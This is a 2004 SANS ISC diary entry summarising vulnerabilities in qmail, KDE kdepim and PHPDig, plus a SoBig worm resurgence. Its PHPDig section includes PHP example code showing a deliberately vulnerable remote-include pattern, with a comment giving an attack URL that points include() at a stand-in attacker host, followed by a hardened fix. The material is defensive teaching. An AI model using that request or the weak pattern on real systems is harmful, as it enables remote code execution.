
SANS ISC InfoSec Handlers Diary Blog



Possible Qmail Vulnerability / KDE Vulnerability / New SoBig Wave? / and more...

Published: 2004-01-15
Last Updated: 2004-01-16 15:19:57 UTC
by Pedro Bueno (Version: 1)
Possible Qmail vulnerability


In an earlier post to the Full-Disclosure (FD) list, a security advisory by Georgi Guninski describes a possible qmail vulnerability.
According to the advisory, there are two main problems:

"a) It is possible to crash qmail-smtpd 1.03 from remote with a long SMTP session. The crash is not global, it affects only the current SMTP session.

b) If gdb is to be believed, it is possible to overwrite memory in qmail-smtpd 1.03 from remote with a long SMTP session."

An exploit was also posted.
Although there is no real evidence that the exploit is effective, users are advised to keep their qmail version up to date. The qmail website does not show any new version, and the discussion of this bug on the qmail mailing list has not reached a conclusion yet.

References: http://www.guninski.com/qmailcrash.html

http://www.qmail.org



KDE Vulnerability


KDE released a security advisory about a potential
vulnerability in its kdepim application.
The kdepim versions distributed with KDE 3.1.0 through 3.1.4 are
vulnerable to a buffer overflow attack.

According to the security advisory, CVE has assigned the
candidate name CAN-2003-0988 to this issue.

The impact of this vulnerability is that local attackers
can execute commands with the victim's privileges. If
information reading is allowed to remote users (not the
default), remote attackers can also take advantage of this
vulnerability.

Users are advised to upgrade to KDE 3.1.5. A patch is also
available for KDE 3.1.4 users.

Reference: http://www.kde.org/info/security/advisory-20040114-1.txt



PHPDig Vulnerability


PHPDig is a search/spider engine written in PHP.
Kernelpanik.org released a security advisory about a remote
code execution vulnerability in PHPDig 1.6.x.

The workarounds, according to the advisory, are to deny web
access to ./include with an .htaccess file, to run with
register_globals off (the default since PHP 4.2), and to apply
an unofficial patch for config.php available at
http://www.kernelpanik.org .

Users are advised to take extreme care with any patch
that is not officially released by the vendor.
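To make the two configuration workarounds concrete, here is an added illustration of the general pattern that register_globals enables in an include file, and of the hardened form that the .htaccess and register_globals advice protects against. This is example code written for this diary entry, not PHPDig's code and not a reconstruction of the actual PHPDig bug; the file name, the variable name $relative_path, the constant APP_ENTRY and the library file name are all assumed for the illustration.

```php
<?php
// include/example_config.php  (assumed name; illustration only, not PHPDig code)
//
// Workaround 1 from the advisory: deny direct web access to ./include.
// Contents of ./include/.htaccess (Apache 1.3/2.0 syntax of the time):
//     Order deny,allow
//     Deny from all
//
// Workaround 2: in php.ini, make sure request variables are not auto-globals:
//     register_globals = Off      ; the default since PHP 4.2

// --- Weak pattern -------------------------------------------------------
// The include file assumes its caller already set $relative_path and never
// initializes or validates it. With register_globals=On, requesting the file
// directly as
//     /include/example_config.php?relative_path=http://attacker.example
// defines $relative_path from the query string, and include() fetches and
// executes remote code (allow_url_fopen was on by default in PHP 4).
function weak_load_library()
{
    global $relative_path;                 // attacker-controlled when register_globals=On
    include $relative_path . '/library.php';
}

// --- Hardened pattern ---------------------------------------------------
// 1. Refuse to run unless the application's front script included us
//    (defense in depth beside the .htaccess deny).
if (!defined('APP_ENTRY')) {               // APP_ENTRY is assumed to be set by the front script
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access to include files is not permitted.');
}

// 2. Derive the base path from a value the program controls, not from a
//    global that a request could have populated, and check that the
//    resolved file really lives inside this include tree.
function safe_load_library()
{
    $base   = realpath(dirname(__FILE__));     // fixed, never request-influenced
    $target = realpath($base . '/library.php');
    if ($target === false || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        trigger_error('library.php missing or outside the include tree', E_USER_ERROR);
    }
    include $target;                           // local file only
}

safe_load_library();
```

The hardened version works even on a server where register_globals is still on, which is the point of the advice: a configuration setting a hosting provider controls should not be the only thing standing between a query string and an include() of remote code.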

Reference: http://www.kernelpanik.org



Personal Firewall Day


An advisory published on various security mailing lists
declared January 15 to be Personal Firewall Day. A website
was also created to educate users about making use of
personal firewalls.

Reference: http://www.personalfirewallday.org/



New SoBig wave?


Some users are reporting a new SoBig wave.

A quick look at the Postini and Trend Micro tracking sites shows that SoBig may be coming back.

Yesterday Postini ranked it #8 and Trend ranked it #10.
Today Postini has it at #6 and Trend has it at #2 worldwide and #1 for North America.

Yesterday (15/01) both reported counts of around 1,000; today Trend has it at over 10,000 and Postini at over 7,000.

References:

http://www.trendmicro.com/map/

http://www.postini.com/stats/

If you are observing these, please contact us.

Thanks to Deb Hale for the reference numbers.

-------------------------------------

Handler on duty: Pedro Bueno